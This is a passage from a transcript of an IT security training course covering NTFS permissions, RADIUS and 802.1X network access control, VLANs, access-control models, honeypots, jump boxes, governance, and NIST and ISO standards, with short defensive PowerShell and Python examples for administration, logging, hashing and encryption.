Check Names button, and the OK button.] and I want to add the Help Desk group. [He enters the name help
desk in the Enter the object name to select text box and clicks the Check Names button.] So I'll go ahead and
type that in and check the name, looks good. I'll click OK. [The Select User, Computer, Service Account, or
Group dialog box closes and the Permission Entry for UserDataFiles dialog box appears on the screen.] So
my Help Desk group can either be Allowed or Denied access to this part of the file system. [He clicks the Type
drop-down list. It includes the Allow and the Deny drop-down options.] Well, we want to Allow it in our
scenario. I want to make sure that they are allowed with the permissions that we will set to the folder itself as
well as subfolders and files within it, whether they exist now or they will exist later because permissions in the
file system get inherited by default. [He clicks the Applies to drop-down list. It includes the This folder only
and the This folder, subfolders and files drop-down options.]
Now notice that when you add an entry to an ACL – so here, the entry is the Help Desk group – it gets Read & execute, List folder contents, and Read permissions by default. [The Basic permissions section
includes the Read & execute checkbox, the List folder contents checkbox, the Read checkbox, and the Show
advanced permissions link. These checkboxes are selected.] That's not enough because we need the Help Desk
group to be able to create folders. For that over on the far right, I'm going to have to click the Show advanced
permissions link. Now you'll notice that one of the permissions that is available is Create folders / append data.
So I'm going to turn that one on and that's it. I'm going to click OK. [The Permission Entry for UserDataFiles
dialog box closes.] And I'll click OK [He clicks the OK button in the Advanced Security Settings for
UserDataFiles dialog box. Then this dialog box closes.] and OK again. [He clicks the OK button in the
UserDataFiles Properties dialog box. Then it closes and the Data (I:) window is displayed.] Now that puts us
back in Windows Explorer. Now that we've applied those changes, let's actually go back and double check our
work. We can do that by right-clicking on the folder and going into Properties. [He right-clicks the
UserDataFiles folder and clicks the Properties option from the flyout.] Then again, clicking on the Security
tab, again clicking the Advanced button, but this time we're going to click the Effective Access tab, where
we're going to Select a user that's in that group. [The Effective Access tabbed page includes the Select a user
link, the select a device link, and the View effective access button. At the bottom right-hand side of the
Advanced Security settings for UserDataFiles dialog box are the OK and Cancel buttons. He clicks the Select
a user link and the Select User, Computer, Service Account, or Group dialog box opens. He types help in the
Enter the object name to select text box and clicks the Check Names button. Then the Multiple Names Found
dialog box opens. It includes the OK and Cancel buttons.]
Now we know that HelpDesk User1 was a member of that group. So we're going to select them and click
OK. [Then the Multiple Names Found dialog box closes. The Select User, Computer, Service Account, or
Group dialog box reappears and he clicks the OK button. Then this dialog box closes and the Advanced
Security Settings for UserDataFiles dialog box reappears.] Now what we want to do is click the View
effective access button down below. [Then a table with three columns and several rows appears below the
View effective access button. The column headers are Effective access, Permissions, and Access limited
by.] Now as we kind of scroll down, so we can see what happens here. Notice that what we do see is that they
do have the ability – there is a green checkmark here, and this little picture of a group which means the user
got it through group membership – that the HelpDesk User1 has the ability to create folders, but they can't
write or delete or do anything like that. So therefore, user files are protected from that. So we've solved our
issue, we've given only the permissions that are required for the Help Desk group in our scenario. In this video, we learned how to set NTFS file system permissions.
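For reference, the same kind of special permission can also be granted from PowerShell. This is only a minimal sketch; it assumes the domain's NetBIOS name is FAKEDOMAIN and uses the same Help Desk group and folder from the demo.

# ReadAndExecute plus CreateDirectories mirrors the 'Create folders / append data' special permission,
# inherited by this folder, subfolders, and files.
$rights = [System.Security.AccessControl.FileSystemRights]'ReadAndExecute, CreateDirectories'
$flags  = [System.Security.AccessControl.InheritanceFlags]'ContainerInherit, ObjectInherit'
$prop   = [System.Security.AccessControl.PropagationFlags]::None
$rule   = New-Object System.Security.AccessControl.FileSystemAccessRule('FAKEDOMAIN\Help Desk', $rights, $flags, $prop, 'Allow')
$acl = Get-Acl 'I:\UserDataFiles'
$acl.AddAccessRule($rule)
Set-Acl -Path 'I:\UserDataFiles' -AclObject $acl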
After completing this video, you will be able to recognize the purpose of controlling network access with
Network Access Control (NAC).
Objectives
[Topic title: Network Access Control. The presenter is Dan Lachance.] The first line of defense for network
security is limiting who can connect to the network in the first place – whether it's wired or wireless. In this
video, we'll talk about Network Access Control. This is often referred to as NAC – N-A-C. And it applies to
connectivity points or edge point devices on the network. Things like network switches, wireless routers, VPN appliances, dial-in appliances, and so on are essentially entry points to the network. Network Access Control
components include the supplicant – this is the client device that's attempting to connect to a network. So it
could be an end user with their smartphone or their laptop or a desktop or tablet device. An endpoint device is
also referred to as a RADIUS client. Now you have to be careful not to confuse that with the supplicant.
So the RADIUS client is not the end-user smartphone or a laptop, for instance, trying to connect through a
VPN, those are called supplicants. A RADIUS client is an edge point network device like a switch, a VPN
device, or a wireless router. Endpoint devices, however, should never perform authentication because they're
on the edge of the network. They potentially could be compromised. And, if they are compromised, we don't
want credentials revealed from those devices. So, instead, they should use an authentication server where they
forward authentication requests. Now the authentication server is simply called a RADIUS server. And this
centralized authentication host should exist on a protected internal network – our endpoint devices will forward
requests to it.
IEEE 802.1X is a security standard. It's port-based Network Access Control where a port is simply a logical
connection to the LAN somehow. It uses EAP – E-A-P, which stands for Extensible Authentication Protocol.
Now only EAP traffic is allowed when a device initially attempts to connect to the network, until after successful authentication. This is called EAPOL or EAP over LAN. This means that the client device – the supplicant – won't even have a valid IP address until after successful authentication, because our endpoint device – let's say it's an Ethernet switch – does have an IP address and can communicate with our central RADIUS server to ensure authentication succeeds first.
Now, in order to be IEEE 802.1X compliant, your equipment may already support it, or it may simply need a firmware update – things like wireless routers or network switches. In some cases, you might actually have to replace your existing endpoint devices. IEEE 802.1X can also integrate with intrusion detection systems (IDSs), intrusion prevention systems (IPSs), a SIEM system used for security monitoring, as well as mobile device management or MDM solutions. Wireless routers can support WPA – Wi-Fi Protected
Access – or WPA2-Enterprise. Now WPA on a wireless network simply means a preshared key is configured
on the wireless router and that must be known by the connecting wireless clients.
However, WPA2-Enterprise is considered more secure than WPA or WPA2 preshared keys – PSKs. Now the
preshared key is simply a symmetric key, but when we use the Enterprise mode of WPA or WPA2, it uses a RADIUS
server, a central authentication server where we configure the RADIUS server IP address and listening port,
which has a default of UDP 1812. Also, a RADIUS client like a VPN appliance or a wireless router needs to be
configured with a shared secret, which is also configured on the centralized RADIUS authentication server. So
the key is used between RADIUS clients and servers and it is case sensitive.
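If the central RADIUS server happens to be a Windows Network Policy Server, registering a RADIUS client and its shared secret can also be scripted. This is a rough sketch only; the name, address, and secret are placeholders, and the NPS PowerShell module must be available on that server.

New-NpsRadiusClient -Name 'BranchWirelessRouter' -Address '192.168.1.1' -SharedSecret 'C@seSensitiveSecret!'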
[The web page of ASUS Wireless Router RT-N66U is open. Along the top of the screen are the Logout and
Reboot buttons. The rest of the page is divided into two parts. The first part includes three sections: the Quick
Internet Setup, General, and Advanced Settings. The General section includes the Network Map, Guest
Network, and AiCloud 2.0 tabs. The Advanced Settings section includes the Wireless, LAN, and WAN tabs. The
second part is divided into two sections. The first section includes a diagram. The diagram includes three
subsections. The first subsection includes the information about the Internet status. The second subsection
includes the information about the security level. The third subsection includes the information about the
clients and the USB devices that are connected. The second section is the System Status. This includes the
2.4GHz tab, the 5Ghz tab, and the Status tab. The 2.4GHz tab is open. It includes the Wireless name(SSID)
text box and the Authentication Method drop-down list.] On the screen, currently, you can see an ASUS
wireless router. And over on the right, under the System Status section, we can see that the Authentication
Method is configured for WPA2-Personal, which uses a preshared key. Here it's using AES encryption. So
there is a preshared key configured down below and that must be known by connecting clients. However, from
the Authentication Method drop-down list, what we could do is use for instance WPA2-Enterprise. [As soon
as Dan selects the WPA2-Enterprise drop-down option, the WPA-PSK key text box disappears.] Notice we
lose the field for the preshared key because it doesn't get used. Instead, what I would do is click on
Wireless over on the left.
Now what you click on will vary greatly from one Wireless router admin page to another. [He selects the
Wireless tab and the Wireless tabbed page opens in the second part. The top of the page includes the General
tab, the WPS tab, and the RADIUS Setting tab. By default, the General tabbed page is open. The General
tabbed page includes the Band drop-down list, the SSID text box, and the Apply button.] But, anyways, here
I'll then click on the RADIUS Setting tab up at the top. [The RADIUS Setting tabbed page opens. It includes
the Band drop-down list, the Server IP Address text box, the Server Port text
box, the Connection Secret text box, and the Apply button.] And this is where I would specify the Server IP
Address of the centralized RADIUS authentication server. [He is referring to the Server IP Address text
box.] You can see that the listening port defaults to 1812. [He is referring to the Server Port text box.] And
then I configure the connection or shared secret that was configured on the RADIUS server. [He resumes the
explanation of the Network Access Control.] One final aspect of Network Access Control is client or
supplicant health checks – not to be confused with the RADIUS client.
We're talking about the actual end-user device like a smartphone or a laptop attempting to connect to the
network. So the health of that device can be checked, and some configurations can be autoremediated. The
things that might be checked in terms of health would be whether or not a malware scanner is functional and
up to date, whether a firewall is enabled on the device, whether updates have been applied, and whether the
correct hardware peripherals exist – which might be required, for instance, for multifactor authentication.
Autoremediation might mean, for instance, that if a firewall is present but not enabled on a connecting device,
it gets enabled so that the device is compliant and can continue to connect to the network. In this video,
we discussed Network Access Control.
Upon completion of this video, you will be able to recognize the purpose of network segregation using virtual
LANs.
Objectives
[Topic title: VLANs. The presenter is Dan Lachance.] In this video, we'll talk about VLANs. A VLAN is a
virtual local area network. It allows us to create a LAN which is considered a broadcast domain. And what that
means is that when a device sends out a broadcast to everyone, it is read by all devices on that LAN. A VLAN is
applied at Layer 2 of the OSI model – the data-link layer, which also deals with MAC addresses. A VLAN
is configured within a switch, which is where the word virtual in VLAN comes from.
All switch ports, however, are in the same VLAN by default. A VLAN can consist of some of the devices plugged
into the switch or all of them. It depends on how we configure the VLAN, which we'll go over
shortly. VLANs can also span multiple switches that are linked together. The purpose of a VLAN can be either
performance – breaking a larger network into smaller segments, which means we end up with multiple
broadcast domains, so multiple VLANs – or security, keeping certain network devices isolated from others.
Now traffic from one VLAN doesn't reach other VLANs without a router – just like, if you had separate physical
local area network segments, you would need a router to link them together. A Layer 3 switch operates at Layer 3
of the OSI model, the network layer, and has routing capabilities built in. Therefore, a Layer 3 switch can link
VLANs without the need for an external router. Now we might, for example,
have a VLAN that's used for imaging, which consumes a lot of bandwidth. And we might also have a different
VLAN for security purposes to keep accounting staff network traffic on its own network.
There are different types of VLAN configurations, the first of which is switch port membership. So, in
other words, the physical switch port that a device is plugged into determines the VLAN that it's a member of.
This would apply to OSI Layer 1 since we're talking about physical characteristics and
things that are plugged in with cables and connectors. The VLAN ports in this case do not have to be
contiguous – although in our pictured diagram they are [A diagram of an Ethernet switch is displayed. It contains
eight ports.] – where the leftmost four ports are part of the OS imaging VLAN, whichever devices
are plugged in, and the rightmost ports are for the accounting VLAN.
So it's important then when we plug devices into a network switch that we are conscious of how VLANs have
been configured. Plugging a station into the wrong switch port could be a problem because it can't
communicate with the server it needs to talk to, whereas plugging it into a different switch port that
puts it on the right VLAN would let it talk to that server. So moved computers might require
either switch VLAN reconfiguration, or you simply might have to plug them into the correct port. We could also
configure MAC address-based VLANs. The MAC address is the 48-bit unique hardware address burned into the
network card. It's also called a Layer-2 address; Layer 2 of the OSI model is the data-link layer.
So devices then with specific MAC addresses would be considered on the same VLAN. Each MAC address of
each device is associated with a specific VLAN. It's important to realize, of course, that switches already track
all of the MAC addresses plugged into specific ports on a switch. So for example, a given 48-bit hex MAC
address might be assigned to VLAN number 5. We can also create IP subnet VLANs, in other words, based on
the IP address of the plugged in device.
This would apply to OSI Layer 3 – the network layer. So devices with a specific IP network prefix are
considered to be on the same VLAN. So therefore, it wouldn't matter then which physical switch port the
device would be plugged into. Routing would allow VLANs to communicate with each other. So for example,
we could have a specific IP network prefix or address that is configured to be on a specific VLAN. [Subnet of
VLAN 5 is 25.1.2.3 and of VLAN 10 is 26.1.2.3.]
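To tie the three membership types together, here is a rough Python sketch – a conceptual model, not vendor switch
code – that decides a device's VLAN from its switch port, its MAC address, or its IP network prefix. All of the port
numbers, addresses, and VLAN IDs are invented for the example.

import ipaddress

# Hypothetical membership tables; a real switch stores these internally.
PORT_VLANS = {1: 5, 2: 5, 3: 5, 4: 5, 5: 10, 6: 10, 7: 10, 8: 10}    # port-based (Layer 1)
MAC_VLANS = {"90-48-9a-11-bd-6f": 5}                                  # MAC-based (Layer 2)
SUBNET_VLANS = {ipaddress.ip_network("25.1.2.0/24"): 5,               # subnet-based (Layer 3)
                ipaddress.ip_network("26.1.2.0/24"): 10}

def vlan_for(port, mac, ip):
    # Check port membership first, then MAC address, then IP subnet.
    if port in PORT_VLANS:
        return PORT_VLANS[port]
    if mac.lower() in MAC_VLANS:
        return MAC_VLANS[mac.lower()]
    address = ipaddress.ip_address(ip)
    for network, vlan in SUBNET_VLANS.items():
        if address in network:
            return vlan
    return 1  # default VLAN

print(vlan_for(port=3, mac="90-48-9A-11-BD-6F", ip="25.1.2.3"))  # prints 5 (port-based match)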
Other VLAN membership types include being configured for certain protocols. So for instance, using the IP
versus the IPX protocol suite or even using higher-level software or services to determine VLAN membership.
For instance, FTP traffic could place devices on an FTP-specific VLAN for that type of traffic. In this video,
we discussed VLANs.
Find out how to identify various conditions that restrict access to resources.
Objectives
[Topic title: Determining Resource Access. The presenter is Dan Lachance.] In this video, we'll talk about
resource access. A resource is something that we can connect to over a network like a file server, a database
server, a web application, and so on. So, when we determine resource access, we're talking about authorization
to use the resource. And authorization can only occur after successful authentication. Authentication is the
proving of one's identity, whether it's a user entering a username and a password or a specific smartphone with
a trusted PKI certificate being allowed to connect to a VPN as an example. ACLs are access control lists that
determine privileges that are granted or denied. Now you could have ACLs that apply at the network level. A
network ACL is something you would see on a packet filtering firewall to control traffic into and out of a
network, but then you could also see an ACL for a database that controls access to do certain things like insert
or update rows in the database table or it could be related to permissions granted to a folder on a file server and
so on. So there are many different incarnations of ACLs.
There are also other attributes that determine access to resources such as time-based, rule-based, location-
based, and role-based configurations. Let's take a look at each of those starting with time based. With time-
based resource access, we need to have a reliable time source. In a network environment, that really means
we're talking about using the Network Time Protocol or NTP to keep time in sync among multiple network
devices. We might have specific days and times where access is allowed. For example, SSH traffic from a
specific subnet to specific hosts might only be allowed during business hours. We might also have different
types of access depending on the time of day. For example, we might ensure that nobody is connected to a
server at 8:00 p.m. during weeknights because of backups.
We might also configure this time-based resource access through policies or on a specific network device. So
we might use centralized Microsoft Group Policies in Active Directory to configure this resource access or it
might be configured on a single device like a Cisco router. Now naturally, when it comes to troubleshooting,
IT technicians need to be aware if this type of time-based resource access is in use because without knowledge
of how this is configured, it could take a long time to troubleshoot why a user can't connect to a resource when,
in fact, it simply might not be allowed based on this type of configuration.
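As a tiny illustration of the idea – not any particular vendor's syntax – here is a Python sketch that permits SSH
only during business hours; the days, hours, and the assumption of server local time are made up for the example.

from datetime import datetime

def ssh_allowed(now=None):
    # Allow SSH only Monday to Friday, 08:00 to 17:59, server local time.
    now = now or datetime.now()
    business_day = now.weekday() < 5      # 0 = Monday ... 4 = Friday
    business_hours = 8 <= now.hour < 18
    return business_day and business_hours

if not ssh_allowed():
    print("SSH access denied outside business hours")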
Then there is rule-based access control, which is also referred to as RBAC or sometimes ABAC where the "A"
stands for attribute-based access control. Basically, what this means is we are using conditions or rules that
determine resource access. An example of this is the Microsoft Windows Server 2012 R2 Dynamic Access
Control or DAC. This means, for example, users might have to belong to a group such as HR, but at the same
time, they have to be full-time employees and they might then get read/write privileges. Now full-time
employees could be determined through group membership, but one of the great things with condition or rule-
based access control is that we don't have to use groups. So, in the case of a Windows user – an Active
Directory user account – maybe there's an attribute filled in that determines whether that user is full-time or
not. So Dynamic Access Control can look at Active Directory attributes instead of just the traditional group
membership.
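Dynamic Access Control itself is a Windows Server feature, but the underlying idea – combining a group check with a
directory attribute – can be sketched in a few lines of Python. The attribute names and values here are illustrative,
not actual Active Directory schema names.

def effective_access(user):
    # Grant read/write only to full-time HR staff; HR contractors get read-only.
    in_hr = "HR" in user.get("groups", [])
    full_time = user.get("employmentType") == "FullTime"   # an attribute, not a group
    if in_hr and full_time:
        return "read/write"
    if in_hr:
        return "read-only"
    return "no access"

print(effective_access({"groups": ["HR"], "employmentType": "FullTime"}))   # read/write
print(effective_access({"groups": ["HR"], "employmentType": "Contract"}))   # read-only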
Location-based access control can also be referred to as LBAC. This is where the physical location of a user or
more specifically a device that they're using determines what access they have to resources. In the case of a
mobile device, we might use GPS tracking to determine the proximity of the user to a certain location or a
wireless network. Geofencing, for example, might disable mobile device cameras when the user is using that
mobile device within a secured area within a facility.
Role-based access control is also often referred to as RBAC. So, whenever you see RBAC, be careful to look
at the context in which that term is being used to ensure that you know whether it's referring to rule-based
access control or, as we're discussing now, role-based access control. With role-based access control,
privileges are assigned to roles. Users are then assigned to the roles. And therefore, they inherit the
permissions assigned to the role they're assigned to. Now this will facilitate access control list management in
larger companies because it's too difficult to manage, on a large scale, individual resource permissions granted
to individual user accounts. In this video, we discussed how to determine resource access.
recognize the purpose of intentionally creating vulnerable hosts to monitor malicious use
[Topic title: Honeypots. The presenter is Dan Lachance.] One way to detect malicious use is to configure a
honeypot. A honeypot is designed to monitor unauthorized use where detection of the activity is key. This is
made simple with virtualization, where there are plenty of virtual appliances we can download, or we could
build our own virtual machine that has a few security vulnerabilities that would attract malicious users –
essentially, it's low-hanging fruit. However, we want to be careful with unpatched DMZ systems.
We want to make sure that a compromised honeypot device doesn't let the attacker into other systems. And, at
the same time, it can also open us up to potential liability claims. Honeypots should be configured to forward
their logs to another secured host elsewhere because the assumption is that the honeypot itself could become
compromised. And, if it does, then any log information – which is what we're looking for here with the
honeypot – well, potentially it could be wiped by the attacker.
Honeypots come in various forms and apply to different levels. We can have an entire server operating system
being configured as a honeypot so we can track malicious activity against it. Or we could have a honeypot for
a specific service such as a vulnerable HTTP web service. Or we could have a honeypot for an individual file
or folder in which case it's called a honeytoken.
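To give a flavour of the service-level honeypot idea, here is a minimal Python sketch of a fake listener that records
every connection attempt and forwards the entries to a separate log host over syslog, in line with the logging advice
above. The port and log-host address are placeholders, and a real deployment would use a purpose-built honeypot such
as the one discussed next rather than this toy.

import logging
import logging.handlers
import socketserver

# Forward events to a separate, secured log host so a compromised honeypot
# can't simply wipe its own evidence.
logger = logging.getLogger("honeypot")
logger.setLevel(logging.INFO)
logger.addHandler(logging.handlers.SysLogHandler(address=("10.0.0.20", 514)))

class FakeService(socketserver.BaseRequestHandler):
    def handle(self):
        # Record who connected and what they sent, then drop the connection.
        data = self.request.recv(1024)
        logger.info("honeypot hit from %s: %r", self.client_address[0], data[:100])

if __name__ == "__main__":
    with socketserver.TCPServer(("0.0.0.0", 2222), FakeService) as server:
        server.serve_forever()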
The HoneyDrive honeypot is a Linux-based virtual appliance that you can download. And it's out of the box
ready to go as an SSH honeypot and a web site honeypot. It also includes a wide variety of monitoring and
analytical tools to analyze SSH and web site traffic for malicious users. [The BruteForce Lab's Blog web page
is open. The page includes Home tab, About Me tab, and Miscellaneous drop-down list. By default, the
HoneyDrive tabbed page is open and the Miscellaneous drop-down list is selected. The Miscellaneous drop-
down list includes the DeltaBot, pyMetascan, and phpMetascan drop-down options.] If you plug HoneyDrive
honeypot into your favorite web search engine, it will be very easy to pull up the HoneyDrive honeypot web
page where you can see a description of what it is, a download link, a set of installation
instructions, and a list of all of the features. So essentially, this is a virtual appliance that will run in different
virtualization environments.
[Dan resumes the explanation of honeypots.] So what is the real benefit of a honeypot? Well, its primary
purpose is to identify attack patterns, attacker identities in some cases, and then we can take those results and
further harden similar systems or services based on our findings from the honeypot. However, drawbacks
include the fact that there could be a liability if the honeypot, for instance, is used to target other victims
elsewhere. The other reality is that, from a legal standpoint, honeypot case law is very difficult to find. So there
really are no precedents on which to base current situations.
Upon completion of this video, you will be able to recognize the purpose of a jump box.
Objectives
[Topic title: Jump Box. The presenter is Dan Lachance.] In this video, we'll discuss jump boxes. A jump box
is a secured computer that administrators go through to administer other devices. So it's a central and definable
entry point for administration. Now we must make sure that we harden the jump box itself. Hardening of the
originating administrative computer is also very important, where we might use a clean virtual machine whose
purpose is only administration – nothing additional gets installed on it.
Now, in terms of network precautions, we should always make sure we're using some type of encryption for all
network transmissions, such as an IPsec VPN. Instead of that, or in addition to it, we might also consider an
isolated VLAN so that administrative traffic is kept separate from regular end-user IP traffic. We
should also consider the targeted systems that will be administered. They must be configured appropriately –
for example, their host-based firewalls should only allow connections from the jump box. We
should also make sure that the jump box computer itself cannot access the Internet because the last thing we
want to happen is for an administrator using the jump box maybe to download a driver from the Internet – for
example – and infect that jump box, which in turn has connections to other servers.
On the originating administrative station or host, there are precautions that we can take to protect our network.
First is to create a process whitelist – in other words, a list of the only processes that are allowed to run on
the originating administrative workstation. We can then determine which accounts are used to log on to that
system. So only administrative accounts, for example, should be allowed to log in to that originating system.
The originating system should also use multifactor authentication. Ideally, you might even use centralized
RADIUS authentication with auditing. Now host logs from this originating system should be forwarded to
another host because if it's compromised, the logs could be wiped.
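As a very rough sketch of the process whitelist idea, the snippet below uses the third-party psutil package – an
assumption, since any inventory method would do – to flag running processes that aren't on an approved list. The
whitelist contents are invented, and a production deployment would rely on OS-level application control rather than a
script like this.

import psutil  # third-party; installed separately

# Hypothetical whitelist for a dedicated administrative workstation.
ALLOWED = {"sshd", "ssh", "bash", "systemd", "python3"}

def unexpected_processes():
    # Return the names of running processes that are not on the whitelist.
    names = set()
    for proc in psutil.process_iter(attrs=["name"]):
        name = (proc.info.get("name") or "").lower()
        if name and name not in ALLOWED:
            names.add(name)
    return sorted(names)

if __name__ == "__main__":
    for name in unexpected_processes():
        print("Not on whitelist:", name)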
A jump box arguably is a compelling target for malicious users. And the reason for this is quite simple because
if the jump box gets compromised, that could then give access potentially to multiple internal servers that are
administered through the jump box. On the question of scalability, you could look at this from two perspectives.
You could say that a jump box scales well because you've got a definable entry point for managing a
multitude of servers, whether they're on premises, in the cloud, or both. But, on the other hand, you could say
that it doesn't scale well. That really depends on specifics; for example, if we're talking about hundreds
of administrators connecting through a single jump box to administer hundreds of internal servers elsewhere,
yes, it could be a scalability issue. So you might need more than one jump box. You might even set them up in
a load-balanced configuration.
In this video, we talked about jump boxes.
Table of Contents
After completing this video, you will be able to explain how proper IT governance results in secured IT
resources.
Objectives
[Topic title: IT Security Governance. The presenter is Dan Lachance.] IT security relates to risk. And risk
management is a very important responsibility. In this video, we'll talk about IT security governance.
IT security strategies need to align with business objectives because that's why IT systems are used in the first
place. There could be legal and regulatory compliance reasons that we have certain security controls in place.
We also have to consider the potential influence of those requirements on organizational security policies. Security governance
also deals with the responsibility related to the IT security strategy for the organization.
The oversight of risk management falls to IT security managers, who must make decisions about effective
security controls that protect assets. IT security governance also deals with decision-making power and where
it lies. The creation of security policies and also the allocation of resources to protect assets fall under the
umbrella of IT security governance. IT security management deals with the enforcement of those security
policies and the actual usage of those resources. So notice the distinction then between IT security governance
and IT security management.
NIST, the National Institute of Standards and Technology in the United States, lists five common areas of IT
security governance where there is the protection of organizational assets, there is the protection of the
organization's reputation, there is the protection of shareholders, there is the acceptable use of IT systems by
organization employees, and of course, there is the assurance of legal and regulatory compliance.
With IT security governance, accountability for the IT security strategy falls upon the leaders. Related costs
are also considered – the costs that are required to stay in business. You can't get away without spending a
penny on IT security in a large organization. It is the cost of doing business. However, it needs to be worth the
investment and it has to, of course, be worth the asset that's being protected. User awareness and training is
very critical in assuring that everyone knows what the organization's specific IT strategy is. IT security
governance also implies that there is ongoing monitoring and review of security controls to ensure their
effectiveness in protecting assets.
After completing this video, you will be able to recognize how compliance with regulations can influence
security controls.
Objectives
Regulations will vary from industry to industry and also from jurisdiction to jurisdiction around the globe.
However, regulations can have an influence over the organization security policy, acceptable use policies, and
also the selection of which security controls will be used. So for example, specific data sanitization or wiping
tools might be required for law enforcement when wiping hard disks before equipment is decommissioned.
Confidentiality could also be a part of regulatory compliance where we are preventing the unauthorized access
of sensitive data. So encryption might be required for data in use, data in motion such as that being transmitted
over a network, and data at rest such as data being stored on disks either on premises or in the cloud. In some
cases, regulations might detail what are acceptable algorithms that are used for the encryption.
Regulatory compliance can also stipulate how we verify data integrity or the trustworthiness of data. There
might be certain authentication controls that must be put in place such as multifactor authentication, which is
required to connect to a sensitive network. Or there might be hashing that is required to generate a unique
value on data so that in the future when we run that calculation again, we can detect whether or not a change
has occurred because if a change has occurred, the unique value or hash will be different than the original hash.
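The hashing idea described here can be illustrated with a few lines of Python using the standard hashlib module; the
file name is just a placeholder.

import hashlib

def sha256_of(path):
    # Compute the SHA-256 digest of a file, reading it in chunks.
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

original = sha256_of("contract.pdf")   # recorded while the data is known to be good
# ... later ...
if sha256_of("contract.pdf") != original:
    print("Integrity check failed: the data has changed since the hash was recorded")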
Regulatory compliance can also apply to the availability of IT systems, networks, and data so that data is
available when it's needed. Now this might require us to use clustering solution so that network services are
running on multiple hosts. And, should one host fail, users will be redirected to that same network service
running on another host. Now, in order for the data to be kept up to date and consistent, clustered servers might
use shared storage. We might also use replication to replicate data to other locations or even to synchronize it
to the cloud. So we have another copy that's available if something happens to the primary copy of data. Now,
if we're going to do that, we should look very carefully at our cloud service-level agreement or SLA to make
sure that we know exactly what the availability promises are from that specific provider.
Some examples of regulations include Canada's PIPEDA. This is the Personal Information Protection and
Electronic Documents Act, which governs how private-sector organizations collect, use, and disclose personal
information. In the United States of America, we've got HIPAA – the Health Insurance Portability and Accountability
Act – which controls how sensitive health information is handled and shared by health care providers, insurers, and
their business associates. In the European Union,
we've got the EU Data Protection Directive – Directive 95/46/EC – which deals with the protection of personal
data in and outside of the European Union.
Find out how to apply NIST's Cybersecurity Framework to your digital assets.
Objectives
apply NIST's Cybersecurity Framework to your digital assets
[Topic title: NIST. The presenter is Dan Lachance.] Standards are an important aspect of computing including
as it relates to security. In this video, we'll talk about NIST.
NIST stands for the National Institute of Standards and Technology in which there is a division called the
Computer Security Resource Center or CSRC. This division deals with the protection of information systems
in terms of tools that can be used and best practices to be followed.
FIPS stands for Federal Information Processing Standard. And it's a guideline used by US government
agencies. FIPS 201-2 deals with personal identity verification of federal employees and contractors. [Dan is
referring to Personal Identity Verification of Federal Employees and Contractors for the year 2013.] Now this
can be done in a variety of ways by using smart card authentication where the possession of the physical card
is required in addition to knowledge of the PIN for the smart card. There are also specific card reader
requirements that must be met for the use of smart cards. There are certain cryptographic algorithm
requirements to be trusted that are part of FIPS 201-2 as well as the use of biometric authentication. Biometric
authentication is based on some unique characteristic that someone possesses such as their fingerprint or their
retinal scan.
FIPS 197 deals with the Advanced Encryption Standard, published in 2001. It supersedes the 1970s-era DES or
Data Encryption Standard. AES uses the Rijndael algorithm. And it applies to both software and firmware,
so it can be used in many different devices and in many different operating systems and applications. AES is a
symmetric block cipher that supports key sizes of 128, 192, and 256 bits.
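As a quick, hedged illustration of AES in practice, here is a sketch using the third-party Python cryptography
package – an assumption, since the standard library has no AES implementation – and note that such a library is only
FIPS-relevant when it is built against a validated cryptographic module.

import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = AESGCM.generate_key(bit_length=256)   # 256-bit AES key
aesgcm = AESGCM(key)
nonce = os.urandom(12)                      # must be unique for every encryption

ciphertext = aesgcm.encrypt(nonce, b"sensitive data at rest", None)
plaintext = aesgcm.decrypt(nonce, ciphertext, None)
assert plaintext == b"sensitive data at rest"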
FIPS 186-4 is the digital signature standard. It defines acceptable methods that can be used to create unique
digital signatures. The purpose of a digital signature is to verify the authenticity of the originator – the sender
of a message. For example, in the case of e-mail, the sender generates a unique digital signature using their
private key to which only they have access. Now, on the receiving end, we can detect whether tampering has
taken place because we'll use a mathematically related public key to verify that the signature value is the same.
If it's different, something has changed. The digital signature standard also deals with nonrepudiation where an
originator cannot deny having sent the message because it was created with the private key to which only they
have access.
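To make the sign-and-verify flow concrete, here is a short sketch using the same third-party cryptography package
with ECDSA over the P-256 curve, one of the signature methods FIPS 186-4 covers; this is illustrative code, not a
FIPS-validated implementation.

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec

message = b"Please transfer the quarterly report."

# The sender signs with a private key to which only they have access.
private_key = ec.generate_private_key(ec.SECP256R1())
signature = private_key.sign(message, ec.ECDSA(hashes.SHA256()))

# The receiver verifies with the mathematically related public key.
try:
    private_key.public_key().verify(signature, message, ec.ECDSA(hashes.SHA256()))
    print("Signature valid - message is authentic and unmodified")
except InvalidSignature:
    print("Signature invalid - the message or signature was tampered with")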
During this video, you will learn how to apply ISO security standards to secure your environment.
Objectives
apply ISO security standards to harden your environment
[Topic title: ISO. The presenter is Dan Lachance.] In this video, I'll discuss ISO.
ISO stands for the International Organization for Standardization. It is a series of standards and best practices
that can be adopted by organizations. In some cases, organizations might require ISO compliance and so,
therefore, must follow standards and best practices as suggested. ISO publishes numerous documents including
ISO/IEC 27033-5. Now this deals with securing communications across networks using virtual private
networks or VPNs. So it will detail VPN types, how VPN appliances are configured, and how VPN
connections supply confidentiality through various encryption methods. Confidentiality prevents sensitive
information from being accessible by unauthorized users.
ISO/IEC 27039 deals with the selection, deployment, and operations of intrusion detection and prevention
systems, otherwise called IDPS. [Dan is referring to the ISO/IEC 27039:2015.] This deals with host analysis,
where we analyze suspicious activity on a host itself, and network analysis, where we inspect network
traffic looking for suspicious activity. In the case of network analysis, we've got to be conscious about
placement of the device or the solution on the network so that we can see the relevant traffic. It also deals with
IDS and IPS tweaking within a specific environment. All network environments are a little bit different from
one another. And as such, what's normal activity on one network might not be normal on another. So tweaking
is crucial. There are also IDS and IPS appliances that come in both hardware form as well as virtual machine
form that we can use in order to adhere to this ISO standard.
[The ISO/IEC 27039:2015(en) web page is open in the www.iso.org web site.] I've gone into my favorite
search engine and searched up ISO 27039. [The ISO/IEC 27039:2015(en) web page is divided into two
sections. The first section is the navigation pane. The second section is the content pane.] And here we can see
the details related to this specific standard. So, as we go through this document, which is available on the
Internet, we can see how it relates to intrusion detection and prevention systems and the guidelines or
recommendations that are part of this ISO standard. Now bear in mind, some organizations or government
agencies might require ISO accreditation. [He resumes the explanation of the ISO.] ISO/IEC 30121 deals with
the governance of digital forensic risk frameworks. This is more related then to the gathering of evidence and
